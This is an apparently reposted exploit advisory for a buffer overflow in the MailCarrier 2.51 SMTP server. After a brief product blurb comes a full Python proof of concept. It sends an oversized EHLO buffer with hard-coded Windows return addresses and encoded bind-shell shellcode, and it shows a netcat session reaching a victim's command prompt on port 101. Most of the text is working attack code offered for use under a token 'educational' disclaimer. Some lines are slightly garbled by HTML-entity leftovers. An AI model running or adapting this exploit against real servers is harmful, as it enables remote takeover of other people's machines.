MailCarrier 2.51 SMTP server Buffer Overflow

信息来源：www.hk20.com

ABOUT :
MailCarrier is a full-featured mail server with the latest security and anti-spam
functions. It supports SSL communication and SMTP/POP3 authentication methods based on
SASL and NTLM that do not transmit message and/or password in clear text. Many spam mails
can be blocked through inquiry of sender's address, inquiry of RBL, filtering of
message content, and so on.

MailCarrier provides you with various methods for running multiple domains. It can execute
a mail server instance per domain in a single computer; you can run lots of mail servers
without interference each other. In addition, you can make many virtual domains and alias
domains per mail server instance as you want. For each domain and instance, you can build
individual spam policy and security policy.



http://www.tabslab.com/en/product/mailcarrier20/





THE POC :
#########################################################

# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow      #

# Advanced, secure and easy to use FTP Server.              #

# 23 Oct 2004 - muts                           #

#########################################################

# D:\BO>mailcarrier-2.5-EHLO.py                     #

#########################################################

# D:\data\tools>nc -v 192.168.1.32 101                      #

# localhost [127.0.0.1] 101 (hostname) open                #

# Microsoft Windows 2000 [Version 5.00.2195]              #

# (C) Copyright 1985-2000 Microsoft Corp.                #

# C:\WINNT\system32>                                      #

#########################################################



import struct

import socket



print "\n\n###############################################"

print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"

print "\nFound & coded by muts [at] whitehat.co.il"

print "\nFor Educational Purposes Only!\n"

print "\n\n###############################################"



def make_overflow_dummy(overflow_len, retaddr):

   return &#39;A&#39; * overflow_len + struct.pack(&#39;<L&#39;, retaddr)



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)



sc2 = "\xEB"

sc2 +=
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF&quo
t;

sc2 +=
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D&quo
t;

sc2 +=
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9&quo
t;

sc2 +=
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C&quo
t;

sc2 +=
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89&quo
t;

sc2 +=
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03&quo
t;

sc2 +=
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F&quo
t;

sc2 +=
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88&quo
t;

sc2 +=
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61&quo
t;

sc2 +=
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9&quo
t;

sc2 +=
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C&quo
t;

sc2 +=
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8&quo
t;

sc2 +=
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68&quo
t;

sc2 +=
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F&quo
t;

sc2 +=
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23&quo
t;

sc2 +=
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89&quo
t;

sc2 +=
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9&quo
t;

sc2 +=
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77&quo
t;

sc2 +=
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77&quo
t;

sc2 +=
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77&quo
t;

sc2 += "\x58\x68\x61\x63\x6B\x90"



# Change RET address as need be.



#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + &#39;\x90&#39; * 32 + sc2  # RET
Win2000 SP4 ENG

buffer = make_overflow_dummy(5097, 0x7d17dd13) + &#39;\x41&#39; * 32 + sc2  #RET WinXP
SP2 ENG



try:

      print "\nSending evil buffer..."

      s.connect((&#39;127.0.0.1&#39;,25))

      s.send(&#39;EHLO &#39; + buffer + &#39;\r\n&#39;)

      data = s.recv(1024)

      s.close()

      print "\nDone! Try connecting to port 101 on victim machine."

except:

      print "Could not connect to SMTP!"





INFOS :



It works as is, but you might want to change the part after the EIP to NOPs in the
following way...just for esthetics sake:



buffer = make_overflow_dummy(5097, 0x7d17dd13) + &#39;x90&#39; * 32 + sc2 #RET WinXP SP2
ENG







Regards to muts & the whitehat&#39;s folks

Jerome ATHIAS